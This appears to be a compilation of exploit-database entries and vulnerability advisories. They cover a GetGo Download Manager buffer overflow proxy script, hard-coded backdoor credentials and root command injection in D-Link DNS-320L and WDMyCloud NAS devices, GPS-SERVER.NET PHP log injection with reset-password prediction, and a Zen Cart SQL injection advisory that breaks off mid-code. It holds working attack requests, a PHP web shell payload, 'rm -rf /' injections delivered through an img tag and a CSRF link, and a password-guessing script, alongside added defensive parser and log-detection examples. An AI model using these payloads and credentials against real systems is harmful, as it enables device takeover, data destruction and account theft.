# Exploit Title: Buffer overflow vulnerability in GetGo Download Manager proxy options 5.3.0.2712
# Date: 01-02-2018
# Tested on Windows 8 64 bits
# Exploit Author: devcoinfet
# Contact: https://twitter.com/wabefet
# Software Link: http://www.getgosoft.com/getgodm/
# Category: webapps
# Attack Type: Remote
# Impact: Code Execution
# To be vulnerable, the victim must have a proxy selected that will maliciously return data in the response.
# Select the proxy IP of the host running this script in case you have a VM running the software,
# and set the port of the proxy under GetGo's proxy settings as well. Now when you download any page
# or any file, the program incorrectly parses the response and passes the request to the malicious host, triggering the overflow.
import socket
from time import sleep

# 7500 "A"s: the oversized reason phrase sent back in the HTTP status line
default_evilbuffer = "A" * 7500

def main():
    ip = "10.10.10.6"   # address the fake proxy listens on
    port = 8055         # port configured as the proxy port in GetGo
    fuzz_test(ip, default_evilbuffer, port)

def fuzz_test(ip, payload, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((ip, port))
    s.listen(1)
    print "\n[+] Listening on %d ..." % port
    cl, addr = s.accept()
    print "[+] Connection accepted from %s" % addr[0]
    print "[+] Pushing fuzz test to %s" % addr[0]
    # status line with an oversized reason phrase, terminated like a normal response
    buffer = "HTTP/1.1 200 " + payload + "\r\n"
    print cl.recv(1000)   # show the request GetGo sent through the "proxy"
    cl.send(buffer)
    print "[+] Sending Fuzzed buffer From Malicious Proxy: OK\n"
    print "[+] Payload type Default Buffer of 7500 A's"
    sleep(3)
    cl.close()
    s.close()

if __name__ == '__main__':
    main()
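As an added example (not part of the exploit above and not GetGo's code), a bounded HTTP status-line parser showing the length check a client must make before copying a reason phrase into a fixed-size buffer; the 512-byte limit is an assumption, not a GetGo value.

```python
"""
Bounded parser for an HTTP/1.x status line, the defensive counterpart to the
oversized "HTTP/1.1 200 AAAA..." response the script above sends.
Added example; the limit below is assumed, not taken from GetGo.
"""
import re

# Assumed limit (not from the page): the RFCs give no cap, so a client picks one.
MAX_STATUS_LINE = 512
STATUS_LINE_RE = re.compile(rb"^HTTP/(\d)\.(\d) (\d{3})(?: ([^\r\n]*))?$")


class StatusLineError(ValueError):
    """Raised when the status line is malformed or exceeds the configured bound."""


def parse_status_line(data, max_len=MAX_STATUS_LINE):
    """Return (major, minor, code, reason) or raise StatusLineError.

    The length check happens before anything is copied into a fixed-size
    destination, which is the step the vulnerable client skipped.
    """
    end = data.find(b"\r\n")
    if end < 0:
        # No terminator inside the bound: refuse rather than keep buffering.
        if len(data) > max_len:
            raise StatusLineError("status line exceeds %d bytes" % max_len)
        raise StatusLineError("status line not terminated")
    line = data[:end]
    if len(line) > max_len:
        raise StatusLineError("status line exceeds %d bytes (%d)" % (max_len, len(line)))
    m = STATUS_LINE_RE.match(line)
    if not m:
        raise StatusLineError("malformed status line: %r" % line[:40])
    major, minor, code, reason = m.groups()
    return int(major), int(minor), int(code), (reason or b"").decode("latin-1")


def safe_parse(data, max_len=MAX_STATUS_LINE):
    """Wrapper returning (ok, result_or_message) for callers that must not raise."""
    try:
        return True, parse_status_line(data, max_len)
    except StatusLineError as exc:
        return False, str(exc)


# Constructed inputs: a normal response and the 7500-byte reason phrase the
# fuzzer above sends (length taken from the script, not measured on GetGo).
BENIGN = b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"
OVERSIZED = b"HTTP/1.1 200 " + b"A" * 7500 + b"\r\n"

if __name__ == "__main__":
    print(safe_parse(BENIGN))     # (True, (1, 1, 200, 'OK'))
    print(safe_parse(OVERSIZED))  # (False, 'status line exceeds 512 bytes (7513)')
```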
DNS-320L ShareCenter Backdoor
Vendor: D-Link
Product: DNS-320L ShareCenter
Version: < 1.06
Website: http://www.dlink.com/uk/en/products/dns-320l-sharecenter-2-bay-cloud-storage-enclosure
###########################################################################
______ ____________ __
/ ____/_ __/ / __/_ __/__ _____/ /_
/ / __/ / / / / /_ / / / _ \/ ___/ __ \
/ /_/ / /_/ / / __/ / / / __/ /__/ / / /
\____/\__,_/_/_/ /_/ \___/\___/_/ /_/
GulfTech Research and Development
###########################################################################
# D-Link DNS-320L ShareCenter Backdoor #
###########################################################################
Released Date: 2018-01-03
Last Modified: 2017-06-14
Company Info: D-Link
Version Info:
Vulnerable
D-Link DNS-320L ShareCenter < 1.06
Possibly various other ShareCenter devices
Not Vulnerable
D-Link DNS-320L ShareCenter >= 1.06
--[ Table of contents
00 - Introduction
00.1 Background
01 - Hard coded backdoor
01.1 - Vulnerable code analysis
01.2 - Remote exploitation
02 - Credit
03 - Proof of concept
04 - Solution
05 - Contact information
--[ 00 - Introduction
The purpose of this article is to detail the research that GulfTech has
recently completed regarding the D-Link DNS 320L ShareCenter.
--[ 00.1 - Background
D-Link Share Center 2-Bay Cloud Storage 2000 (DNS-320L) aims to be a
solution to share, stream, manage and back up all of your digital files by
creating your own personal Cloud.
--[ 01 - Hard coded backdoor
While doing some research on another device, I came across a hard coded
backdoor within one of the CGI binaries. Several different factors such as
similar file structure and naming schemas led me to believe that the code
that was in the other device was also shared with the DNS-320L ShareCenter.
As it turned out our hunch was correct. An advisory regarding the other
vulnerable device in question will be released in the future, as the vendor
for that device is still in the process of addressing the issues.
Now, let's take a moment to focus on the following file which is a standard
Linux ELF executable and pretty easy to go through.
/usr/local/modules/cgi/nas_sharing.cgi
The above file can be accessed by visiting "/cgi-bin/nas_sharing.cgi" and
contains the following function that is used to authenticate the user.
--[ 01.1 - Vulnerable code analysis
Below is the pseudocode created from the disassembly of the binary. I have
renamed the function to "re_BACKDOOR" to visually identify it more easily.
struct passwd *__fastcall re_BACKDOOR(const char *a1, const char *a2)
{
    const char *v2; // r5@1
    const char *v3; // r4@1
    struct passwd *result; // r0@4
    FILE *v5; // r6@5
    struct passwd *v6; // r5@7
    const char *v7; // r0@9
    size_t v8; // r0@10
    int v9; // [sp+0h] [bp-1090h]@1
    char s; // [sp+1000h] [bp-90h]@1
    char dest; // [sp+1040h] [bp-50h]@1

    v2 = a2;   // base64-encoded password
    v3 = a1;   // username
    memset(&s, 0, 0x40u);
    memset(&dest, 0, 0x40u);
    memset(&v9, 0, 0x1000u);
    if ( *v2 )
    {
        v8 = strlen(v2);
        _b64_pton(v2, (u_char *)&v9, v8);   // v9 now holds the decoded password
        if ( dword_2C2E4 )
        {
            sub_1194C((const char *)&unk_1B1A4, v2);
            sub_1194C("pwd decode[%s]\n", &v9);
        }
    }
    // Hard coded credential check, taken before /etc/shadow is ever consulted
    if ( !strcmp(v3, "mydlinkBRionyg")
      && !strcmp((const char *)&v9, "abc12345cba") )
    {
        result = (struct passwd *)1;
    }
    else
    {
        v5 = (FILE *)fopen64("/etc/shadow", "r");
        while ( 1 )
        {
            result = fgetpwent(v5);
            v6 = result;
            if ( !result )
                break;
            if ( !strcmp(result->pw_name, v3) )
            {
                strcpy(&s, v6->pw_passwd);
                fclose(v5);
                strcpy(&dest, (const char *)&v9);
                v7 = (const char *)sub_1603C(&dest, &s);
                // normal path: compare the transformed password against the shadow entry
                return (struct passwd *)(strcmp(v7, &s) == 0);
            }
        }
    }
    return result;
}
As you can see in the above code, the login functionality specifically
looks for an admin user named "mydlinkBRionyg" and will accept the password
of "abc12345cba" if found. This is a classic backdoor. Simply log in with
the credentials shown in the code above.
--[ 01.2 - Remote exploitation
Exploiting this backdoor is fairly trivial, but I wanted a root shell, not
just admin access with the possibility of shell access. So, I started
looking at the functionality of this file and noticed the method referenced
when the "cmd" parameter was set to "15". This particular method happened
to contain a command injection issue. Now I could turn this hard coded
backdoor into a root shell, and gain control of the affected device.
However, our command injection does not play well with spaces, or special
characters such as "$IFS", so I got around this by just playing ping pong
with pipes, and syslog() in order to create a PHP shell. These are the
steps that I took to achieve this.
STEP01: We send a logout request to /cgi-bin/login_mgr.cgi?cmd=logout with
the "name" parameter value set to that of our malicious PHP wrapper code
within our POST data. This "name" parameter is never sanitized.
name=
At this point we have successfully injected our payload into the user logs,
as the name of the user who logs out is written straight to the user logs. A
user does not have to be logged in in order to log out and inject data.
STEP02: We now use cat to read in the user log file and pipe it out to the
web directory in order to create our PHP web shell.
GET /cgi-bin/nas_sharing.cgi?dbg=1&cmd=15&user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&system=cat/var/www/shell.php HTTP/1.1
At this point an attacker can now simply visit the newly created web shell
and execute any PHP code that they choose, as root.
http://sharecenterhostname/shell.php?01100111=phpinfo();
By sending a request like the one above a remote attacker would cause the
phpinfo() function to be displayed, thus demonstrating successful remote
exploitation as root.
--[ 02 - Credit
James Bercegay
GulfTech Research and Development
--[ 03 - Proof of concept
We strive to do our part to contribute to the security community.
Metasploit modules for issues outlined in this paper can be found online.
--[ 04 - Solution
Upgrade to firmware version 1.06 or later. See the official vendor website
for further details.
--[ 05 - Contact information
Web
https://gulftech.org
Mail
security@gulftech.org
Copyright 2018 GulfTech Research and Development. All rights reserved.
# Exploit Title: GPS-SERVER.NET SAAS CMS <=3.0 Multiple Vulnerabilities
# Exploit Author: Noman Riffat
# Vendor Homepage: http://www.gps-server.net/
# Software Link: http://www.gps-server.net/
# Version: <=3.0
# Tested on: Linux and Windows
# CVE : CVE-2017-17097, CVE-2017-17098
GPS-SERVER.NET SAAS CMS Version <=3.0 Suffers from multiple vulnerabilities
which results in complete takeover of the target remotely.
1. Remote Code Injection (Works until version 3.0)
The writeLog function in fn_common.php in gps-server.net GPS Tracking
Software (self hosted) through 3.0 allows remote attackers to inject
arbitrary PHP code via a crafted request that is mishandled during admin
log viewing. Login, signup and other common incidents are logged into a PHP
file in /logs/ directory with the given input. For example an attacker can
use PHP code in password recovery mode instead of email which will be
injected into the PHP log file.
Demo:
Go to the vulnerable site
Click recover tab
Give following code in email field, fill captcha and click submit
<?php system($_GET[cmd]); ?>
Unfortunately every POST request in the CMS passes through the
mysql_real_escape_string() function, which escapes every quote in the
payload with a backslash. So you have to make sure your payload doesn't
contain any quotes. Fortunately, PHP is flexible enough to accept an unquoted
string: as you can see, the payload above has no quotes around "cmd" but it
still works. The shell can then be collected from here
https://localhost/logs/YYYY_MM_user_access.php
YYYY=Current Year
MM=Current Month
Use the payload carefully. If you mess it up, the PHP log file will get
corrupted and you have to wait until next month for the CMS to generate a new
log file for you :)
Unfortunately the header of log files only allows admin session to access
log data which makes it less of a RCE. Code will only be executed if admin
checks the log files. But fortunately there is another vulnerability
(explained below) which allows an attacker to hijack admin's account hence
making the RCE exploitable with 100% success.
2. Password Reset Vulnerability (Tested up to version 2.7)
gps-server.net GPS Tracking Software (self hosted) 2.x has a password reset
procedure that immediately resets passwords upon an unauthenticated
request, and then sends e-mail with a predictable (date-based) password to
the admin, which makes it easier for remote attackers to obtain access by
predicting this new password. This is related to the use of gmdate()
function for password creation in fn_connect.php.
Demo:
Go to the vulnerable site
Click recover tab
Input admin's email, fill captcha and click submit. Now execute following
PHP code on your local machine immediately.
<?php
// print the 20 candidate passwords for a 20 second window around the local clock
for ($seconds = -10; $seconds < 10; $seconds++) {
    echo substr(hash('sha1', gmdate('d F Y G i s u', time() + $seconds)), 0, 6) . '<br>';
}
?>
Submitting the password reset form and executing the code above should be
done in parallel to predict the password as closely as possible.
Unfortunately I couldn't make a full remote exploit because of the captcha in
the password reset form. The code predicts the 20 possible passwords
generated over a 20 second window. It might not be possible to synchronize
timing between your local machine and the target's server, so the code
generates 20 passwords (10 before the actual time and 10 after). Set your
local machine's time as accurately as you can to get the perfect combo :)
The password reset vulnerability was tested up to version 2.7 but doesn't
work on version 3.0, which means it was fixed somewhere between version 2.7
and 3.0; since the CMS isn't open source I can't say exactly when (I only had
the source code of versions 2.5.9 and 2.7). It appears the reset
vulnerability was patched unintentionally, as the developers added an
intermediate step to the password reset procedure: the CMS sends a password
reset link to the admin's email and the password is only reset once the admin
clicks the link. Since we don't know when the admin will click the link, we
can't predict the new password.
Mitigation: Update CMS to version 3.1
Give me feedback @nomanriffat :)
WDMyCloud Multiple Vulnerabilities
Vendor: Western Digital
Product: WDMyCloud
Version: <= 2.30.165
Website: https://www.wdc.com/products/network-attached-storage.html
###########################################################################
______ ____________ __
/ ____/_ __/ / __/_ __/__ _____/ /_
/ / __/ / / / / /_ / / / _ \/ ___/ __ \
/ /_/ / /_/ / / __/ / / / __/ /__/ / / /
\____/\__,_/_/_/ /_/ \___/\___/_/ /_/
GulfTech Research and Development
###########################################################################
# WDMyCloud <= 2.30.165 Multiple Vulnerabilities #
###########################################################################
Released Date: 2018-01-04
Last Modified: 2017-06-11
Company Info: Western Digital
Version Info:
Vulnerable
MyCloud <= 2.30.165
MyCloudMirror <= 2.30.165
My Cloud Gen 2
My Cloud PR2100
My Cloud PR4100
My Cloud EX2 Ultra
My Cloud EX2
My Cloud EX4
My Cloud EX2100
My Cloud EX4100
My Cloud DL2100
My Cloud DL4100
Not Vulnerable
MyCloud 04.X Series
--[ Table of contents
00 - Introduction
00.1 Background
01 - Unrestricted file upload
01.1 - Vulnerable code analysis
01.2 - Remote exploitation
02 - Hard coded backdoor
02.1 - Vulnerable code analysis
02.2 - Remote exploitation
03 - Miscellaneous security issues
03.1 - Cross site request forgery
03.2 - Command injection
03.3 - Denial of service
03.4 - Information disclosure
04 - Reused Code
05 - Credit
06 - Proof of concept
07 - Disclosure timeline
08 - Solution
09 - Contact information
10 - References
--[ 00 - Introduction
The purpose of this article is to detail the research that I have completed
regarding the Western Digital MyCloud family of devices.
Several serious security issues were uncovered during my research.
Vulnerabilities such as pre auth remote root code execution, as well as a
hardcoded backdoor admin account which can NOT be changed. The backdoor
also allows for pre auth remote root code execution on the affected device.
The research was conducted on both a WDMyCloud 4TB and a WDMyCloudMirror
16TB with the latest available firmware 2.30.165. My research shows that
the 04 branch of the WDMyCloud firmware is not vulnerable to these issues.
--[ 00.1 - Background
WD My Cloud is a personal cloud storage unit for organizing your photos and
videos. It is currently the best selling NAS (network attached storage)
device listed on the amazon.com website, and is used by individuals and
businesses alike. Its purpose is to host your files, and it can also sync
them with various cloud and web based services.
--[ 01 - Unrestricted file upload
The WDMyCloud device is vulnerable to an unrestricted file upload
vulnerability within the following file:
/usr/local/modules/web/pages/jquery/uploader/multi_uploadify.php
The root of the problem here is the misuse and misunderstanding of PHP's
gethostbyaddr() function by the developer of this particular piece of code.
The PHP manual defines the return values of gethostbyaddr() as follows:
"Returns the host name on success, the unmodified ip_address on failure, or
FALSE on malformed input."
With a brief overview of the problem, let's have a look at the offending
code in order to get a better understanding of what is going on with this
particular vulnerability.
--[ 01.1 - Vulnerable code analysis
Below is the code from the vulnerable "multi_uploadify.php" script. You can
see that I have annotated the code to explain what is happening.
#BUG 01: Here the attacker controlled "Host" header is used to define the
remote auth server. This is by itself really bad, as an attacker could
easily just specify that the host be the IP address of a server that they
are in control of. But, if we send it an invalid "Host" header it will just
simply return FALSE as defined in the PHP manual.
$ip = gethostbyaddr($_SERVER['HTTP_HOST']);
$name = $_REQUEST['name'];
$pwd = $_REQUEST['pwd'];
$redirect_uri = $_REQUEST['redirect_uri'];
//echo $name ." ".$pwd." ".$ip;
#BUG 02: At this point, this request should always fail. The $result
variable should now be set to FALSE.
$result = @stripslashes( @join( @file( "http://".$ip."/mydlink/mydlink.cgi?cmd=1&name=".$name."=&pwd=".$pwd ),"" ));
#BUG 03: Here an empty haystack is searched, and thus strstr() returns a
value of FALSE.
$result_1 = strstr($result,"0");
$result_1 = substr ($result_1, 0,28);
#BUG 04: The strncmp() call here is a strange one. It looks for a specific
login failure. So, it never accounts for when things go wrong or slightly
unexpected. As a result this "if" statement will always be skipped.
if (strncmp ($result_1,"0",28) == 0 )
//if (strstr($result,"0")== 0 )
{
    header("HTTP/1.1 302 Found");
    header("Location: ".$redirect_uri."?status=0");
    exit();
}
#BUG 05: At this point all checks have been passed, and an attacker can use
this issue to upload any file to the server that they want.
The rest of the source code was omitted for the sake of brevity, but it
just handles the file upload logic once the user passes the authentication
checks.
--[ 01.2 - Remote exploitation
Exploiting this issue to gain a remote shell as root is a rather trivial
process. All an attacker has to do is send a POST request that contains a
file to upload in the "Filedata[0]" parameter, a location for the file to
be uploaded to in the "folder" parameter, and of course a bogus "Host"
header.
I have written a Metasploit module to exploit this issue. The module will
use this vulnerability to upload a PHP webshell to the "/var/www/"
directory. Once uploaded, the webshell can be executed by requesting a URI
pointing to the backdoor, and thus triggering the payload.
--[ 02 - Hard coded backdoor
After finding the previously mentioned file upload vulnerability I decided
to switch gears and start reversing the CGI binaries that were accessible
via the web interface. The CGI binaries are standard Linux ELF executables
and pretty easy to go through. Within an hour of starting I stumbled
across the following file:
/usr/local/modules/cgi/nas_sharing.cgi
The above file can be accessed by visiting "/cgi-bin/nas_sharing.cgi" but
it produces server errors with every single method, except when the "cmd"
parameter was set to "7". This piqued my interest and so I really started
digging into the binary, as it seemed very buggy and possibly vulnerable.
As it turns out the error was caused due to buggy code and nothing I was or
wasn't doing wrong. But, while I was figuring out the cause of the error I
happened to come across the following function that is used to authenticate
the remote user.
--[ 02.1 - Vulnerable code analysis
Below is the pseudocode created from the disassembly of the binary. I have
renamed the function to "re_BACKDOOR" to visually identify it more easily.
struct passwd *__fastcall re_BACKDOOR(const char *a1, const char *a2)
{
    const char *v2; // r5@1
    const char *v3; // r4@1
    struct passwd *result; // r0@4
    FILE *v5; // r6@5
    struct passwd *v6; // r5@7
    const char *v7; // r0@9
    size_t v8; // r0@10
    int v9; // [sp+0h] [bp-1090h]@1
    char s; // [sp+1000h] [bp-90h]@1
    char dest; // [sp+1040h] [bp-50h]@1

    v2 = a2;   // base64-encoded password
    v3 = a1;   // username
    memset(&s, 0, 0x40u);
    memset(&dest, 0, 0x40u);
    memset(&v9, 0, 0x1000u);
    if ( *v2 )
    {
        v8 = strlen(v2);
        _b64_pton(v2, (u_char *)&v9, v8);   // v9 now holds the decoded password
        if ( dword_2C2E4 )
        {
            sub_1194C((const char *)&unk_1B1A4, v2);
            sub_1194C("pwd decode[%s]\n", &v9);
        }
    }
    // Hard coded credential check, taken before /etc/shadow is ever consulted
    if ( !strcmp(v3, "mydlinkBRionyg")
      && !strcmp((const char *)&v9, "abc12345cba") )
    {
        result = (struct passwd *)1;
    }
    else
    {
        v5 = (FILE *)fopen64("/etc/shadow", "r");
        while ( 1 )
        {
            result = fgetpwent(v5);
            v6 = result;
            if ( !result )
                break;
            if ( !strcmp(result->pw_name, v3) )
            {
                strcpy(&s, v6->pw_passwd);
                fclose(v5);
                strcpy(&dest, (const char *)&v9);
                v7 = (const char *)sub_1603C(&dest, &s);
                // normal path: compare the transformed password against the shadow entry
                return (struct passwd *)(strcmp(v7, &s) == 0);
            }
        }
    }
    return result;
}
As you can see in the above code, the login functionality specifically
looks for an admin user named "mydlinkBRionyg" and will accept the password
of "abc12345cba" if found. This is a classic backdoor. Simply log in with
the credentials I just mentioned from the above code.
Also, it is peculiar that the username is "mydlinkBRionyg", and that the
vulnerability in Section 1 of this paper refers to a non existent file name
of "mydlink.cgi" but, more about that later in section 4...
--[ 02.2 - Remote exploitation
At first, to the untrained eye, exploiting this backdoor to do useful
things may seem problematic due to the fact that only method "7" gives us
no error. And, method 7 only allows us the ability to download any files in
"/mnt/", but no root shell. But, we want a root shell. Right?
After digging deeper I realized that the CGI script was dying every time,
but only at the final rendering phase due to what seems like an error where
the programmer forgot to specify the content type header on output, thus
confusing the webserver and causing the crash. So, everything we do gets
executed up until that point successfully. It is just blind execution.
Now that I had that figured out I started looking for a method I could then
exploit to gain shell access. I started with method "51" because it was the
first one I looked at. This particular method happened to contain a command
injection issue. Now I easily could turn this backdoor into a root
shell, and gain control of the affected device.
GET /cgi-bin/nas_sharing.cgi?dbg=1&cmd=51&user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&start=1&count=1;touch+/tmp/gulftech; HTTP/1.1
By sending a request like the one above a remote attacker could now execute
any commands as root. And yes, the password is base64 encoded, as that is
what the script expects. In the example above I simply create a file called
"gulftech" located in the "/tmp/" directory.
The triviality of exploiting this issue makes it very dangerous, and even
wormable. Not only that, but users confined to a LAN are not safe either. An
attacker could literally take over your WDMyCloud just by having you visit
a website where an embedded iframe or img tag makes a request to the
vulnerable device using one of the many predictable default hostnames for
the WDMyCloud, such as "wdmycloud" and "wdmycloudmirror".
<img src="http://wdmycloud/cgi-bin/nas_sharing.cgi?dbg=1&cmd=51&user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&start=1&count=1;rm+-rf+/;">
For example simply visiting the above link will totally destroy a WDMyCloud
without the need for any type of authentication whatsoever, and there is
nothing you can do about it except delete the file as the credentials are
hardcoded into the binary itself.
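Detection logic a defender could run over web-server access logs for the nas_sharing.cgi backdoor login and the cmd=51 / cmd=15 command-injection requests shown in this advisory and in the D-Link DNS-320L advisory earlier on this page. This is an added example, not GulfTech's code or the Metasploit modules it mentions; the combined log format, the IPs and timestamps in the sample lines, and the "system"-parameter heuristic are assumptions.

```python
"""
Access-log detection for the hard coded nas_sharing.cgi credentials and the
command injection patterns from the advisories above. Added example; only the
credential strings, the CGI path and the cmd numbers come from the page.
"""
import base64
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Strings taken from the advisory text; everything else here is constructed.
BACKDOOR_USER = "mydlinkBRionyg"
BACKDOOR_PASS = "abc12345cba"
CGI_PATH = "/cgi-bin/nas_sharing.cgi"
INJECTION_CMDS = {"15", "51"}   # D-Link cmd=15, WDMyCloud cmd=51
# '&' is left out because it separates query parameters.
SHELL_META = re.compile(r"[;|`$]")

# Assumed combined-log-format line: ip - - [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def _b64_to_text(value):
    """Decode the passwd parameter as the binary does (base64, padding optional)."""
    try:
        padded = value + "=" * (-len(value) % 4)
        return base64.b64decode(padded).decode("latin-1")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify_request(target):
    """Return the list of rule names matched by one request target ([] if none)."""
    parts = urlsplit(target)
    if parts.path != CGI_PATH:
        return []
    q = parse_qs(parts.query, keep_blank_values=True)
    user = q.get("user", [""])[0]
    pwd = _b64_to_text(q.get("passwd", [""])[0])
    cmd = q.get("cmd", [""])[0]
    findings = []
    if user == BACKDOOR_USER:
        findings.append("backdoor-user")
        if pwd == BACKDOOR_PASS:
            findings.append("backdoor-password")
    if cmd in INJECTION_CMDS:
        # Heuristic: shell metacharacters anywhere in the query, or the
        # "system" parameter the D-Link request used (assumption, not a spec).
        if SHELL_META.search(unquote(parts.query)) or "system" in q:
            findings.append("cmd%s-injection-pattern" % cmd)
    return findings


def scan_log(lines):
    """Yield (ip, time, findings) for every line that triggers at least one rule."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            yield m.group("ip"), m.group("time"), findings


# Constructed sample lines (addresses and timestamps invented); the second
# request mirrors the cmd=51 example in the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jan/2018:10:00:01 +0000] "GET /cgi-bin/nas_sharing.cgi'
    '?cmd=7&user=alice&passwd=c2VjcmV0 HTTP/1.1" 200 512',
    '198.51.100.7 - - [04/Jan/2018:10:00:02 +0000] "GET /cgi-bin/nas_sharing.cgi'
    '?dbg=1&cmd=51&user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&start=1&count=1;'
    'touch+/tmp/gulftech; HTTP/1.1" 500 0',
    '203.0.113.5 - - [04/Jan/2018:10:00:03 +0000] "GET /web/index.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, when, hits in scan_log(SAMPLE_LOG):
        print(ip, when, ", ".join(hits))
```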
--[ 03 - Miscellaneous vulnerabilities
In addition to the two critical vulnerabilities described above, there were
also several other issues. These are still very dangerous, but in some cases
require authentication, are for the most part not considered as critical,
and require less technical explanation.
--[ 03.1 - Cross site request forgery
There is no real XSRF protection within the WDMyCloud web interface. This
can have quite the impact on unsuspecting users. Exploitation of this issue
is trivial.
http://wdmycloud/web/dsdk/DsdkProxy.php?;rm -rf /;
For example, if a logged in WDMyCloud admin visits, or is forced to visit
the above link, then the entire device will be wiped out. This is just one
of many XSRF issues. We do not have time to track them all down.
--[ 03.2 - Command injection
Some time ago, a researcher from the "Exploiteers" team found an alarming
number of command injection issues within the WDMyCloud. Unfortunately, we
were able to find quite a few as well.
class RemoteBackupsAPI{
    public function getRecoverItems()
    {
        $xmlPath = "/var/www/xml/rsync_recover_items.xml";
        $jobName = $_REQUEST['jobName'];
        @unlink($xmlPath);
        $cmd = "rsyncmd -l \"$xmlPath\" -r \"$jobName\" >/dev/null";
        system($cmd);
        if (file_exists($xmlPath))
        {
            print file_get_contents($xmlPath);
        }
        else
        {
            print "";
        }
    }
}
The above code is an example of the type of command injection issues that
still plague the WDMyCloud. This particular command injection is post auth,
as were all of the other command injections I found too. However, I did not
have time to sift through looking for all of these. And by now I feel
that the manufacturer should know better considering they just went through
the process of patching many command injection vulnerabilities disclosed by
the Exploiteers.[1]
--[ 03.3 - Denial of service
It is possible for an attacker to abuse language preferences functionality
in order to cause a DoS to the web interface. This is due to the fact that
any unauthenticated user can set the global language preferences for the
entire device and all of its users. The pseudocode from the disassembled
binary can be seen below.
int cgi_language()
{
    int v1; // [sp+0h] [bp-10h]@1
    cgiFormString("f_language", &v1, 8);
    xml_set_str((int)"/language", (int)&v1);
    xml_write_file("/etc/NAS_CFG/config.xml");
    LIB_CP_Config_To_MTD(1);
    cgiHeaderContentType("text/html");
    return system("language.sh > /dev/null 2>&1 &");
}
This is not a very useful attack vector since we only have 8 bytes to work
with. But, you can make a script that keeps randomly resetting the language
to some random language and it will affect all users of the device and
requires no authentication. It is very hard to use the device if it is
rendering all of the pages in a language you can not understand.
http://wdmycloud/cgi-bin/login_mgr.cgi?cmd=cgi_language&f_language=7
The above example request sets the language to Korean. There are 17
available language codes; details can be found in language.sh on the
target device.
--[ 03.4 - Information disclosure
It is possible for an attacker to dump a list of all users, including
detailed user information.
GET /api/2.1/rest/users? HTTP/1.1
Making a simple request to the webserver like the one above will dump the
user information to an attacker for all users. This does not require any
authentication in order to take advantage of.
--[ 04 - D-Link DNS-320L ShareCenter
As I have mentioned earlier in this article, I found it peculiar that
the username used for the backdoor is "mydlinkBRionyg", and that the
vulnerability in Section 1 of this paper refers to a non existent file name
of "mydlink.cgi". This really piqued my curiosity, and so I started using
google to try to track down some leads. After searching for the term of
"mydlink.cgi" I came across a reference to a post made by a D-Link user
regarding their D-Link DNS-320L ShareCenter NAS device.[2]
Within that post were references to file names and directory structure that
were fairly unique, and from the D-link device. But, they also perfectly
matched my WDMyCloud device. The more I looked into this the weirder it
seemed. So, I gained access to a D-Link DNS-320L ShareCenter. Once I had it
things became pretty clear to me as the D-Link DNS-320L had the same exact
hard coded backdoor and same exact file upload vulnerability that was
present within the WDMyCloud. So, it seems that the WDMyCloud software
shares a large amount of the D-Link DNS-320L code, backdoor and all. There
are also other undeniable examples such as misspelled function names and
other anomalies that match up within both the WDMyCloud and the D-Link
DNS-320L ShareCenter code.
It should be noted that unlike the WDMyCloud the D-Link DNS-320L is
currently NOT vulnerable to the backdoor and file upload issues, so you
should upgrade your DNS-320L firmware as soon as possible as the issues can
be leveraged to gain a remote root shell on the DNS-320L if you are not up
to date with your device firmware. The backdoor was first removed in the
1.0.6 firmware release. (July 28, 2014)
It is interesting to think about how before D-Link updated their software
two of the most popular NAS device families in the world, sold by two of
the most popular tech companies in the world were both vulnerable at the
same time, to the same backdoor for a while. The time frame in which both
devices were vulnerable at the same time in the wild was roughly from early
2014 to later in 2014 based on comparing firmware release note dates.
--[ 05 - Credit
James Bercegay
GulfTech Research and Development
--[ 06 - Proof of concept
We strive to do our part to contribute to the security community.
Metasploit modules for issues outlined in this paper can be found online.
--[ 07 - Disclosure timeline
2017-06-10
Contacted vendor via web contact form. Assigned case #061117-12088041.
2017-06-12
Support member Gavin referred us to WDC PSIRT. We immediately sent a PGP
encrypted copy of our report to WDC PSIRT.
2017-06-13
Received confirmation of report from Samuel Brown.
2017-06-16
A period of 90 days is requested by vendor until full disclosure.
2017-12-15
Zenofex posts disclosure of the upload bug independently of my research [3]
2018-01-03
Public Disclosure
--[ 08 - Solution
N/A
--[ 09 - Contact information
Web
https://gulftech.org/
Mail
security@gulftech.org
--[ 10 - References
[1] https://blog.exploitee.rs/2017/hacking_wd_mycloud/
[2] http://forums.dlink.com/index.php?topic=65415.0
[3] https://www.exploitee.rs/index.php/Western_Digital_MyCloud
Copyright 2018 GulfTech Research and Development. All rights reserved.
Zen Cart SQL Injection
Vendor: Zen Ventures, LLC
Product: Zen Cart
Version: <= 1.3.8a
Website: http://www.zen-cart.com
BID: 31023
CVE: CVE-2008-6985
OSVDB: 48346
SECUNIA: 31758
PACKETSTORM: 69640
Description:
Zen Cart is a full featured open source ecommerce web application written in php that allows users to build, run and promote their own online store. Unfortunately there are multiple SQL Injection issues in Zen Cart that may allow an attacker to execute arbitrary SQL queries on the underlying database. This may allow for an attacker to gather username and password information, among other things. An updated version of Zen Cart has been released to address these issues and users are encouraged to upgrade as soon as possible.
SQL Injection
There are a couple of SQL Injection issues within Zen Cart that may allow a malicious attacker to execute arbitrary SQL queries and gather arbitrary data from the database. The first issue is due to product attribute values not being properly sanitized (particularly the value of certain "id" parameters) when adding to or updating the shopping cart. The queries that are vulnerable to SQL injection can either be an update query or an insert query, depending on the current shopping cart state and whether or not the customer is logged in. However, Zen Cart installations running with a database that supports sub selects are vulnerable to exploitation. Otherwise the issue is limited in regards to its ability to be exploited.
function actionMultipleAddProduct($goto, $parameters) {
    global $messageStack;
    if (is_array($_POST['products_id']) && sizeof($_POST['products_id']) > 0) {
        foreach($_POST['products_id'] as $key=>$val) {
